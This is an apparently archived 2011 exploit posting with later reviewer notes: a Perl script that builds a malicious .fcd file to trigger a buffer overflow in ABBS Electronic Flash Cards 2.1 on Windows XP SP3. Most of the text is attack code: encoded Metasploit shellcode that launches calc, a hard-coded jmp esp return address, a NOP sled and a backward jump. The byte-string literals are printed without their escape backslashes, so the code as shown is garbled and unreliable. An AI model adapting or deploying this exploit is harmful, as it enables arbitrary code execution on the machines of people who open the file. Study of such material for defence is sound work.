ABBS Electronic Flash Cards 2.1 Buffer Overflow
Posted on 15 March 2011
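# Exploit Title: ABBS Electronic Flash Cards Buffer Overflow Exploit
# Software Link: http://abbs.qsnx.net/downloads/abbs-flashcards.zip
# Version: 2.1
# triggering details : open the app, go to test, click on random, and start test,
#                      then chose the fcd file, and booom calc pops up
# Tested on: Win XP SP3 French
# Date: 14/03/2011
# Author: h1ch4m
# Email: h1ch4m@live.fr
# Home: http://net-effects.blogspot.com
#
# Reviewer notes:
# - This script only generates a file. The memory-corruption bug itself is in
#   the application's handling of .fcd files (per the title and the triggering
#   details above); the vulnerable code is not shown on this page.
# - Layout written to the file: $junk + $stack + $shellcode fill exactly $size
#   bytes, followed by $eip, $nops and $jump. Presumably $size is the distance
#   from the start of the overflowed buffer to the saved return address; that
#   is inferred from the layout, not demonstrated here.
# - $eip is a hard-coded address that the author describes as an instruction
#   inside a system DLL. Such an address is presumably valid only on the tested
#   OS build. The technique depends on fixed module addresses and an executable
#   stack, which ASLR and DEP respectively take away.
# - The payload is described by the author as a generated "exec" payload whose
#   command is calc, i.e. a visible demonstration of code execution.
# - The page names no fixed version of the application. Until one is
#   identified, .fcd files from untrusted sources are hostile input.
# - NOTE(review): the byte-string literals below appear to have lost their
#   escape backslashes in extraction; they are reproduced exactly as printed.

use strict;
use warnings;

my $file = "exploit.fcd";   # output file name
my $size = 4108;            # bytes written before the return-address value ($eip)

# make a room for our shellcode
my $stack = "x31xc0" .      # xor eax, eax
            "xb4x10" .      # mov ah, 10h
            "x29xc4" .      # sub esp, eax
            "x90";          # nop, 0x0a is a bad char, so i added a nop 0x0a becomes 0x09 (jump)

# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode =
    "xbfxa0x03xb5xf2x33xc9xb1x32xdbxdfxd9x74x24" .
    "xf4x5ax31x7ax0ex03x7ax0ex83x62x07x57x07x9e" .
    "xe0x1exe8x5exf1x40x60xbbxc0x52x16xc8x71x63" .
    "x5cx9cx79x08x30x34x09x7cx9dx3bxbaxcbxfbx72" .
    "x3bxfaxc3xd8xffx9cxbfx22x2cx7fx81xedx21x7e" .
    "xc6x13xc9xd2x9fx58x78xc3x94x1cx41xe2x7ax2b" .
    "xf9x9cxffxebx8ex16x01x3bx3ex2cx49xa3x34x6a" .
    "x6axd2x99x68x56x9dx96x5bx2cx1cx7fx92xcdx2f" .
    "xbfx79xf0x80x32x83x34x26xadxf6x4ex55x50x01" .
    "x95x24x8ex84x08x8ex45x3exe9x2fx89xd9x7ax23" .
    "x66xadx25x27x79x62x5ex53xf2x85xb1xd2x40xa2" .
    "x15xbfx13xcbx0cx65xf5xf4x4fxc1xaax50x1bxe3" .
    "xbfxe3x46x69x41x61xfdxd4x41x79xfex76x2ax48" .
    "x75x19x2dx55x5cx5excfxa4x6dx4ax58x1fx04x37" .
    "x04xa0xf2x7bx31x23xf7x03xc6x3bx72x06x82xfb" .
    "x6ex7ax9bx69x91x29x9cxbbxf2xacx0ex27xf5";

my $eip  = pack('V', 0x7c86467b);       # jmp esp kernel32.dll
my $nops = "x90" x 8;
my $jump = "xe9x09xffxffxff";           # jump back 247 bytes

# Padding is sized so that padding + $stack + $shellcode is exactly $size bytes.
my $junk = "x90" x ($size - length($stack . $shellcode));

# Three-argument open with a lexical handle; every I/O step is checked so a
# failed write is reported instead of being followed by a success message.
open(my $fh, '>', $file)
    or die "Cannot open $file for writing: $!\n";
print {$fh} $junk . $stack . $shellcode . $eip . $nops . $jump
    or die "Cannot write to $file: $!\n";
close($fh)
    or die "Cannot close $file: $!\n";

print "Files Created successfully ";
sleep(1);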
